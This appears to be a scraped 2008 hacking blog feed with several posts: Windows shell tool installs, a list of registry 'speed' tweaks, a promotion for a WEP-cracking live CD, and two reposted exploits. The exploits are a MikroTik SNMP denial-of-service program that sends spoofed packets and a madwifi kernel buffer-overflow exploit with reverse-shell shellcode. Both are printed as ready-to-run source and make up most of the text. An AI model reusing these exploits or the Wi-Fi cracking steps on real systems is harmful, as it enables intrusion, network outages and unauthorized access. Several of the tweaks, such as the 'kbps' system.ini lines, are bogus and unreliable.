/></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-24239188143776913372008-04-20T08:25:00.002+07:002008-05-13T05:07:31.720+07:00Sometimes<br /><p>I use windows. I know and like linux but not as a desktop operating system.<br />I often find myself typing “ls” or “cat” inside the windows shell, which obviously returns an error.</p> <p>I started to P.I.M.P. my windows shell (cmd.exe)</p> <ol><li> I downloaded <a href="http://sourceforge.net/projects/unxutils">unxutils</a> from sourceforge unpacked the archive,<br />went to usr\local\wbin copied every file that is there and pasted them in c:\windows\system32\ without replacing the windows utilities (there are 3 files that i don’t recommend overwriting)<br />Now i have ls, cat, tee, grep …</li><li> Downloaded <a href="http://www.vulnwatch.org/netcat/">netcat for windows</a> copied all the files in c:\windows\system32\<br />Now i have nc - a very good telnet client, and can also be used as a server <img src="http://websecurity.ro/blog/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /> </li><li> I got <a href="http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx">pstools from sysinternals</a> put the executables in c:\windows\system32\</li><li> Plus <a href="http://nmap.org/download.html">nmap for windows</a> put it in the same windows path.<br />A must use tool…</li><li> I also like <a href="http://wiki.hping.org/86">hping2</a>, for those who don’t know it, it’s a packet crafter.</li></ol> <p>Now you can use your windows command line. Until now it was pretty much useless.</p> <p>Now you can<br /><code>nmap -A -O -vv websecurity.ro | tee websecurity_report.txt | grep open</code></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2423918814377691337?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-83345933267309898942008-04-20T08:22:00.002+07:002008-05-13T05:07:55.292+07:00<p style="font-family:verdana;"><span style="font-size:85%;">——————————————-<br /><strong>PC MORE FASTER MORE THAN BEFORE<br /></strong>================================<br />HKEY_CURRENT_USER\Control Panel\Desktop<br />then select<br />MenuShowDelay<br />change 400 to 0</span> </p> <p style="font-family:verdana;"><span style="font-size:85%;">——————————————<br /><strong>MAKE COPY EASY N FASTER<br /></strong>==========================<br />HKEY_CURRENT_USER\Control Panel\Desktop<br />then change PaintDesktopVersion from 0 to1</span> </p> <p style="font-family:verdana;"><span style="font-size:85%;">———————————————–<br /><strong>CHANGE THE ORGANIZATION OR THE OWNER NAMES</strong><br />========================================<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion<br />then on RegisteredOrganization and RegisteredOwner<br />you can type any thing you want</span> </p> <p style="font-family:verdana;"><span style="font-size:85%;">—————————————————-</span></p> <p style="font-family:verdana;"><span style="font-size:85%;"><strong>MAKE APPLICATION OPEN MORE POWER<br /></strong>===========================================<br />HKEY_CLASSES_ROOT\exefile<br />then right click on shell and make new key and putit name is<br />high priority<br />and then click on high priority and make new key and put it name is<br />command<br />and in the other side modify the value to<br />c:\WINDOWS\System32\cmd.exe /c start “runhigh” /high “%1</span></p> <p style="font-family:verdana;"><span style="font-size:85%;">——————————————————-</span></p> <p style="font-family:verdana;"><span style="font-size:85%;"><span id="more-15"></span></span></p> <p style="font-family:verdana;"><span style="font-size:85%;"><strong>MAKE A COPY TO FOLDER AND MOVE TO FOLDER IN CONTEXT MENU OPTION</strong><br />===================================<br />HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex<br />AND ON THE “ContextMenuHandlers”<br />RIGHT CLICK AND MAKE A NEW KEY AND NAME IT “COPY TO FOLDER…”<br />THEN IN OTHER SIDE DOUBLE CLICK AND PUT THE FOLLWING<br />{C2FBB630-2971-11d1-A18C-00C04FD75D13}<br />REPET ONE MORE AND MAKE NEW KEY BUT TIS TIME NAME IT TO ” MOVE TO FOLDER…”<br />{C2FBB631-2971-11d1-A18C-00C04FD75D13}</span></p> <pre style="font-family:verdana;"><span style="font-size:85%;">AND RESTART THE PC</span></pre> <p style="font-family:verdana;"><span style="font-size:85%;">————————————————————<br /><strong>INCREASE YOUR CONNECTION</strong><br />========================<br />HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Internet Settings</span> </p> <p style="font-family:verdana;"><span style="font-size:85%;">then make 3 new values<br />MaxConnectionsPer1_0Server value (a)<br />MaxConnectionsPer1_0Server value (b)<br />MaxConnectionsPerServer value (a)-</span></p> <p style="font-family:verdana;"><span style="font-size:85%;">——————————–<br /><strong>START MENU</strong><br />===========<br />RUN<br />TYPE “SYSTEM.INI”<br />AND IN THE END<br />PUT THE FOLLWING</span> </p> <p style="font-family:verdana;"><span style="font-size:85%;">page buffer=100000kbps<br />load=100000kbps<br />Download=100000kbps<br />save=100000kbps<br />back=100000kbps</span></p> <p style="font-family:verdana;"><span style="font-size:85%;">——————————————————–<br /><strong>PUT YOU NAME ON WINDOW TITLE</strong><br />===============================</span> </p> <p style="font-family:verdana;"><span style="font-size:85%;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main<br />and type<br />WINDOW TITLE<br />================================================== =====</span></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-8334593326730989894?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-32443196535189496592008-04-19T08:21:00.001+07:002008-05-13T05:08:22.805+07:00By Yudhax <table cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td class="article"><img style="width: 362px; height: 271px;" src="http://i19.tinypic.com/6bcmp7n.jpg" /><br /><br /><p><strong>Five InterChangeAble Mirrors By Tâñvïr¥û$ûF For RapidSearching.CoM</strong> </p> <p><span><span>Live</span><span> Cd For <span>Wireless Hacking</span>, Also Used By The Fbi</span></span><br />This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).<br />- Live CD with all the tools you need to hack a WLAN / wireless Access point -<br />Linux Live-CD - OS runs from CD - 635 mb - .iso<br /><strong>- also used by the FBI …</strong></p> <p><span> </span></p> <p>WEP Hacking - The Next Generation</p> <p>WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.<br />Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of “strong” encryption while a 128 bit key has 104. The IV is placed in encrypted frame’s header, and is transmitted in plain text.<br />Traditionally, crac*ing WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets—a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP crac*ing program such as Aircrac* would be used to find the WEP key.<br /><span> Fast-forward to last summer, when the first of the latest generation of WEP <a target="_blank" style="border-bottom: 2px solid rgb(0, 0, 121); text-decoration: none;">cracking tools</a> appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, “It doesn’t matter if you use 128 bit WEP keys, you are vulnerable!”</span><br />WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products.<br />WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.<br />Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long.<br />A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of “strong” encryption while a 128 bit key has 104.<br />The IV is placed in encrypted frame’s header, and is transmitted in plain text.<br />Traditionally, cracking WEP keys has been a slow and boring process.<br />An attacker would have to capture hundreds of thousands or millions of packets a process that could take hours or even days, depending on the volume of traffic passing over the wireless network.<br />After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.<br />Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared.<br />This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours.<br />Basic Directions:</p> <p>1)Boot from cd<br />2)get the wep key<br />3)write it down<br />4)reboot into windows<br />5)connect using wep key.</p></td></tr></tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3244319653518949659?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-15393216450238598032008-04-19T08:10:00.003+07:002008-05-13T05:21:34.714+07:00<p class="author"> By Yudhax </p> <pre>File Publish of, damned shit...<br />Good progress bro...</pre><br />/* --------------------------------------------------------------------------<br />* (c) ShadOS 2008<br />* _ _ _ _ _ __ _ _ _ <br />* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___<br />* | __ / -_) | | ' &lt;| ' \| / _` | ' \ _(_-&lt;<br />* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/<br />* hellknights.void.ru |___/ .0x48k.<br />*<br />* --------------------------------------------------------------------------<br />*<br />* MicroTik RouterOS &lt;=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux )<br />* Don't forget to visit our site and my homepage for new releases:<br />* http://hellknights.void.ru<br />* http://shados.freeweb7.com<br />* Also, you can mail me any bugs or suggestions:<br />* mailto: shados /at/ mail /dot/ ru<br />*<br />* Thanks 2 antichat.ru and all my friends.<br />* --------------------------------------------------------------------------<br />*<br />* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.<br />*<br />* This program is free software; you can redistribute it and/or modify<br />* it under the terms of the GNU General Public License as published by<br />* the Free Software Foundation; either version 2, or (at your option)<br />* any later version.<br />*<br />* This program is distributed in the hope that it will be useful,<br />* but WITHOUT ANY WARRANTY; without even the implied warranty of<br />* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the<br />* GNU General Public License for more details.<br />*<br />* You should have received a copy of the GNU General Public License<br />* along with this program; if not, write to the Free Software Foundation,<br />* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.<br />*<br />* --------------------------------------------------------------------------<br />*/<br /><br />#include &lt;stdio.h&gt;<br />#include &lt;stdlib.h&gt;<br />#include &lt;sys/types.h&gt;<br />#include &lt;sys/socket.h&gt;<br />#include &lt;netinet/in.h&gt;<br />#include &lt;netinet/ip.h&gt;<br />#include &lt;netinet/udp.h&gt;<br />#include &lt;netdb.h&gt;<br />#include &lt;memory.h&gt;<br />#include &lt;string.h&gt;<br /><br />char evilcode[] = {<br />0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00<br />};<br /><br /><br />unsigned short in_cksum(addr, len)<br />u_short *addr;<br />int len;<br />{<br />register int nleft = len;<br />register u_short *w = addr;<br />register int sum = 0;<br />u_short answer = 0;<br /><br />while (nleft &gt; 1) {<br /> sum += *w++;<br /> sum += *w++;<br /> nleft -= 2;<br />}<br />if (nleft == 1) {<br /> *(u_char *) (&amp;answer) = *(u_char *) w;<br /> sum += answer;<br />}<br />sum = (sum &gt;&gt; 17) + (sum &amp; 0xffff);<br />sum += (sum &gt;&gt; 17);<br />answer = -sum;<br />return (answer);<br />}<br /><br />int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)<br />{<br />char *packet;<br />struct sockaddr_in dstaddr;<br />struct iphdr *ip;<br />struct udphdr *udp;<br />packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);<br />memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);<br />if (packet == NULL) { perror("Malloc failed\n"); exit(-1); }<br />ip = (struct iphdr *)packet;<br />udp = (struct udphdr *)(packet+sizeof(struct iphdr));<br />ip-&gt;saddr = *saddr;<br />ip-&gt;daddr = *daddr;<br />ip-&gt;version = 4;<br />ip-&gt;ihl = 5;<br />ip-&gt;ttl = 255;<br />ip-&gt;id = htons((unsigned short) rand());<br />ip-&gt;protocol = IPPROTO_UDP;<br />ip-&gt;tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);<br />ip-&gt;check = in_cksum(ip, sizeof(struct iphdr));<br />udp-&gt;source = htons(sport);<br />udp-&gt;dest = htons(dport);<br />udp-&gt;len = htons(sizeof(struct udphdr) + len);<br />memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);<br />dstaddr.sin_family = AF_INET;<br />dstaddr.sin_addr.s_addr = *daddr;<br />if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&amp;dstaddr,sizeof(struct sockaddr_in)) &lt; 0)<br /> perror("sendto() failed");<br />free(packet);<br />}<br /><br />char * makereq(char *community,int *size)<br />{<br />char *buf;<br />char *ptr;<br />int len;<br />int i;<br /><br />len = 5 + strlen(community) + sizeof(evilcode);<br />buf = (char *)malloc(len);<br />ptr = buf;<br /><br />*ptr++ = 0x30;<br />*ptr++ = len;<br /><br />/* Snmp Version */<br />*ptr++ = 0x02;<br />*ptr++ = 0x01;<br />*ptr++ = 0x00;<br /><br />/* Community */<br />*ptr++ = 0x04;<br />*ptr++ = strlen(community);<br />strcpy(ptr,community);<br />ptr = ptr + strlen(community);<br /><br /><br />*ptr++ = 0xa3; /* Set Request */<br /><br />memcpy(ptr, evilcode, sizeof(evilcode));<br />ptr = ptr + sizeof(evilcode);<br /><br />*size = len+2;<br />return buf;<br />}<br /><br />int erexit(char *msg)<br />{<br />printf("%s\n",msg);<br />exit (-1) ;<br />}<br /><br />int usage()<br />{<br />printf("Usage: ./snmpdos &lt;-s source&gt; &lt;-d dest&gt; &lt;-c community&gt;\n");<br />}<br /><br />int main(int argc, char **argv)<br />{<br />char *saddr,*daddr,*community;<br />unsigned char *buf;<br />int size;<br />int sock;<br />unsigned long lsaddr,ldaddr;<br />int i;<br /><br />saddr = NULL;<br />daddr = NULL;<br />if (argc != 7) { usage(); erexit("not enough args\n"); }<br /><br />if (!strcmp(argv[1],"-s"))<br />saddr = strdup(argv[2]);<br />if (!strcmp(argv[3],"-d"))<br />daddr = strdup(argv[4]);<br />if (!strcmp(argv[5],"-c"))<br />community = strdup(argv[6]);<br /><br />printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);<br /><br />if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)<br />erexit("Invalid source/destination IP address\n");<br /><br />if (saddr == NULL) { usage(); erexit("No Source Address"); }<br />if (daddr == NULL) { usage(); erexit("No Dest Address"); }<br /><br />sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);<br />if (sock == -1)<br />erexit("Couldnt open Raw socket!(Are you root?)\n");<br /><br />lsaddr = inet_addr(saddr);<br />ldaddr = inet_addr(daddr);<br /><br />buf = makereq(community,&amp;size);<br /><br />sendudp(sock,&amp;lsaddr,&amp;ldaddr,32788,161,buf,size);<br />fprintf(stdout,"Sent packet. SNMPd must be down.\n");<br />return 0;<br /><br />}<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-1539321645023859803?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-77770934534397908782008-04-19T08:05:00.001+07:002008-05-13T05:10:16.910+07:00<pre>So nice... sgrakkyu, thanks bro..<br />antifork.org <viva></viva></pre><br /><br />/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------<br />* expoit code by: sgrakkyu &lt;at&gt; antifork.org -- 10/1/2007<br />*<br />* CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES)<br />*<br />* (for wpa)<br />* ....<br />* memcpy(buf, se-&gt;se_wpa_ie, se-&gt;se_wpa_ie[1] + 2)<br />* ....<br />* ....<br />* the function re-uses args in the stack before returning so we<br />* can't trash them overwriting.<br />* Different compiled module [ex. different version of gcc] may require<br />* a different pad value.. (see -g option)<br />*<br />* ex:<br />* on one terminal runs: nc -l -p 31337<br />* phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon<br />* phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor<br />* phi:~/kexec/lorcon# ifconfig ath1 up<br />* phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337<br />* [opt-ip]: 10.0.0.1<br />* [opt-port]: 31337<br />* [opt-iface]: ath1<br />* [opt-driver]: madwifing<br />* [opt-jump]: 0xffffe777<br />* [pad]: 36<br />*<br />* [*][Low Avail Byte]: 103<br />* [*][High Avail Byte]: 47<br />* [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47<br />* [*][ patching jump ]: [eba7]<br />* [*][Payload space]: 192<br />* [*][beacon_frame-80211]=54<br />* [*][beacon_WPA_IE_lenght]: 198<br />*<br />* [printing frame - start]<br />* 80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc<br />* cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00<br />* 64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c<br />* 18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90<br />* 90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40<br />* ....<br />* ....<br />*<br />*<br />* Tuning option:<br />* - depending on gcc version/optimization we have to change the padding of vector<br />* payload, take a look to the following disassembly of the module wlan.o compiled<br />* with gcc-4.0 (kernel compiled for i586):<br />*<br />* 00015a49 &lt;giwscan_cb&gt;:<br />* 15a49: 55 push %ebp<br />* 15a4a: 57 push %edi<br />* 15a4b: 56 push %esi<br />* 15a4c: 53 push %ebx<br />* 15a4d: 81 ec c4 00 00 00 sub $0xbc,%esp &lt;--16+188=[204]<br />* .........<br />* .........<br />* .........<br />* 15fc3: 8d 54 24 12 lea 0xa(%esp),%edx &lt;-esp+[10]<br />* 15fc7: 89 d7 mov %edx,%edi<br />* ...<br />* ...<br />* 15fd5: f3 a5 rep movsl %ds:(%esi),%es:(%edi)<br />* <br />*<br />* this is not a rule, check gcc generated code to calculate correct pad value :<br />* [startbuf-ret] = (16 + 188 - 10) = 194 byte<br />* PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36<br />* ( -g 36 would be the choice in that case)<br />* <br />* NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN<br />* for ex. when the iface gets up or during iwlist iface scanning<br />* command<br />*<br />* 2) if you need more space for kernel mode code you can rely on<br />* struct ieee80211_scan_entry paramter of gwiscan_cb()<br />* function to access the real frame (a trivial joke)<br />*<br />* 3) i had no time to test this exploit on other boxes..:<br />* tested only on: Slackware 10 - madwifi 0.9.2<br />* Kubuntu - kernel 2.6.17 - madwifi 0.9.2<br />*<br />*<br />* TNX TNX TNX twiz &lt;at&gt; antifork.org<br />*/<br /><br /><br />#include &lt;stdio.h&gt;<br />#include &lt;stdlib.h&gt;<br />#include &lt;sys/socket.h&gt;<br />#include &lt;getopt.h&gt;<br />#include &lt;netinet/in.h&gt;<br />#include &lt;sys/socket.h&gt;<br /><br />#include &lt;tx80211.h&gt;<br />#include &lt;tx80211_packet.h&gt;<br />#include &lt;linux/wireless.h&gt;<br />#include &lt;arpa/inet.h&gt;<br /><br /><br />/* 2.6.17 VSYSCALL: for &gt;= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */<br />#define VSYSCALL_JMP_ESP_OFFSET 0xffffe777<br />#define IE_ZERO 0x00000000<br /><br />#define FIX_BYTE(base,offset,byte) *(((unsigned char*)base) + offset) = byte;<br />#define FIX_WORD(base,offset,word) *((unsigned short *)((unsigned char*)base + offset)) = word;<br />#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword;<br /><br />/* shellcode max buffer */<br />/* 8 bytes used for lenght + oui */<br />#define SHELLCODE_SPACE 150<br />#define PAD_SPACE 36<br /><br />#define PAYLOAD_SPACE (SHELLCODE_SPACE + pad_space + 4 + 2)<br />#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE)<br /><br />/* exp option */<br />char *iface = NULL; /* needed */<br />char *driver = NULL; /* needed */<br />char *ip = NULL; /* needed */<br />short port = 0; /* needed */<br />unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET;<br />unsigned int pad_space = PAD_SPACE;<br /><br /><br /><br />/* ----------------------------------- */<br /><br />#define SUB_OFFSET_PATCH 8<br />char ring0_code[]=<br />"\xe8\x00\x00\x00\x00" //call 8048359 &lt;main+0x21&gt;<br />"\x5e" //pop %esi<br />"\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */<br />"\x31\xc0" //xor %eax,%eax<br />"\xb0\x04" //mov $0x4,%al<br />"\x01\xc4" //add %eax,%esp<br />"\x83\x3c\x24\x73" //cmp $0x73,%esp<br />"\x75\xf8" //jne 8048364 &lt;main+0x2c&gt;<br />"\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp)<br />"\x75\xf1" //jne 8048364 &lt;main+0x2c&gt;<br />"\x29\xc4" //sub %eax,%esp<br />"\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi<br />"\x89\x3c\x24" //mov %edi,(%esp)<br />"\x31\xc9" //xor %ecx,%ecx<br />"\xb1\x5b" //mov $0x5b,%cl /* FIX */<br />"\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi)<br />"\xcf"; //iret<br /><br /><br />/* connect back */<br />#define IP_OFFSET 35<br />#define PORT_OFFSET 44<br />char u_code[] =<br />"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */<br />"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d" <br />"\xbe"<br />"\xf5\xff\xff\xfe" // ~ip<br />"\xf7\xd6\x56\x66\xbd"<br />"\x69\x7a" // port<br />"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9" <br />"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"<br />"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf"; <br /><br /><br />/* 802.11header + WPA IE prolog */<br />#define WPA_LEN_OFFSET 55<br />#define CHANNEL 11<br />char beacon_80211_wpa[] =<br />"\x80" // management frame / subtype beacon<br />"\x00" // flags<br />"\x00\x00" // duration<br />"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr<br />"\xCC\xCC\xCC\xCC\xCC\xCC" // src address<br />"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid<br />"\x00\x00" // seq<br />"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp<br />"\x64\x00" // interval<br />"\x01\x00" // caps<br />"\x00\x03\x41\x41\x41" // ssid Information Element<br />"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element<br />"\x03\x01\x0B" // channel Information Element (11)<br />"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */<br />"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len)<br /><br />#define JUMP_OFFSET_PATCH 1<br />char jmp_back[]="\xeb\x00";<br /><br />/* ----------------------------------- */<br /><br /><br />void usage(char *prog)<br />{<br /> printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog);<br />}<br /><br />unsigned char *build_frame()<br />{<br /> int i,j;<br /> char *frame = malloc(TOTAL_PACKET_LEN);<br /> char *ptr = frame;<br /><br /> unsigned int hsb = sizeof(ring0_code)-1;<br /> unsigned int lsb = SHELLCODE_SPACE - hsb;<br /> printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n",<br /> lsb, hsb);<br /><br /> printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n",<br /> sizeof(u_code)-1, sizeof(ring0_code)-1);<br /><br /> /* fix jump */<br /> int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1);<br /> FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b);<br /><br /> /* fix ring0_code/u_code displacement */<br /> unsigned int sub = 5 + (sizeof(u_code)-1);<br /> FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);<br /><br /> printf("[*][payload space]: %d\n", PAYLOAD_SPACE);<br /><br /> /* fix beacon_80211_wpa: WPA len */<br /> FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);<br /> printf("[*][beacon_WPA_IE_lenght]: %u\n",<br /> (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);<br /><br /> /* fill frame */<br /> memset(frame, 0x00, TOTAL_PACKET_LEN);<br /><br /> memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1);<br /> ptr += (sizeof(beacon_80211_wpa)-1);<br /><br /> memset(ptr, 0x90, lsb - (sizeof(u_code)-1));<br /> ptr += (lsb - (sizeof(u_code)-1));<br /><br /> memcpy(ptr, u_code, sizeof(u_code) -1);<br /> ptr += (sizeof(u_code) -1);<br /><br /> memcpy(ptr, ring0_code, sizeof(ring0_code)-1);<br /> ptr += sizeof(ring0_code)-1;<br /><br /> for(i=0; i&lt;pad_space; i+=4)<br /> *((unsigned int *)(ptr + i)) = (IE_ZERO+(i/4));<br /><br /> ptr += pad_space;<br /><br /> *((unsigned int *)(ptr)) = jmp_address;<br /> ptr += 4;<br /><br /> memcpy(ptr, jmp_back, sizeof(jmp_back)-1);<br /> ptr += sizeof(jmp_back)-1;<br /><br /> return (unsigned char*)frame;<br />}<br /><br />void print_frame(unsigned char *frame, unsigned int size)<br />{<br /> int i;<br /> printf("\n[printing frame - start]\n ");<br /> for(i=1; i&lt;=size; i++)<br /> {<br /> printf("%02x ", frame[i-1]);<br /> if((i % 16) == 0)<br /> printf("\n ");<br /> }<br /> printf("\n[printing frame - end]\n");<br />}<br /><br />void parse_arg(int argc, char **argv)<br />{<br /> int opt;<br /> struct in_addr in;<br /> while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF)<br /> {<br /> switch(opt)<br /> {<br /> case 'j':<br /> jmp_address = strtoll(optarg, NULL, 16);<br /> break;<br /> case 'a':<br /> ip = strdup(optarg);<br /> inet_aton(ip, &amp;in);<br /> FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr)); <br /> break;<br /> case 'p':<br /> port = atoi(optarg);<br /> FIX_WORD(u_code, PORT_OFFSET, port);<br /> break;<br /> case 'd':<br /> driver = strdup(optarg);<br /> break;<br /> case 'i':<br /> iface = strdup(optarg);<br /> break;<br /> case 'g':<br /> pad_space = atoi(optarg);<br /> break;<br /> default:<br /> usage(argv[0]);<br /> exit(1);<br /> }<br /> }<br />}<br /><br /><br />int main(int argc, char *argv[])<br />{<br /> int i=0;<br /> struct tx80211 in_tx;<br /> struct tx80211_packet in_packet;<br /> int drivertype;<br /><br /> parse_arg(argc, argv); <br /><br /> if(!iface || !driver || !ip || !port)<br /> {<br /> usage(argv[0]);<br /> exit(1);<br /> }<br /><br /> printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu &lt;at&gt; antifork.org\n"<br /> "-------------------- **** ------------------\n"<br /> "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"<br /> "-------------------- **** ------------------\n\n",<br /> ip, port, iface, driver, jmp_address, pad_space);<br /><br /> unsigned char *frame = build_frame();<br /> print_frame(frame, TOTAL_PACKET_LEN);<br /><br /> /* Use the command-line argument as the desired driver type */<br /> drivertype = tx80211_resolvecard(driver);<br /><br /> /* Validate the driver name specified */<br /> if (drivertype == INJ_NODRIVER)<br /> {<br /> fprintf(stderr, "Driver name not recognized.\n");<br /> return -1;<br /> }<br /><br /> if (tx80211_init(&amp;in_tx, iface, drivertype) &lt; 0) {<br /> fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);<br /> return -1;<br /> }<br /><br /> if ((tx80211_getcapabilities(&amp;in_tx) &amp; TX80211_CAP_CTRL) == 0)<br /> {<br /> fprintf(stderr, "Driver does not support transmitting control frames.\n");<br /> return -1;<br /> }<br /><br /> if (tx80211_setchannel(&amp;in_tx, CHANNEL) &lt; 0)<br /> {<br /> fprintf(stderr, "Error setting channel.\n");<br /> return 1;<br /> }<br /><br /> if (tx80211_open(&amp;in_tx) &lt; 0)<br /> {<br /> fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);<br /> return 1;<br /> }<br /><br /> /* Initialized in_packet with packet contents and length of the packet */<br /> in_packet.packet = frame;<br /> in_packet.plen = TOTAL_PACKET_LEN;<br /><br /> printf("[sending packets]: about 10 a second\n");<br /><br /> while(i &lt; 10000)<br /> {<br /> /* Transmit the packet */<br /> if (tx80211_txpacket(&amp;in_tx, &amp;in_packet) &lt; 0)<br /> {<br /> fprintf(stderr, "Unable to transmit packet.\n");<br /> perror("txpacket");<br /> return 1;<br /> }<br /> i++;<br /> usleep(100000);<br /> }<br /> /* Close the socket after transmitting the packet */<br /> tx80211_close(&amp;in_tx);<br /><br /> return 0;<br />}<div 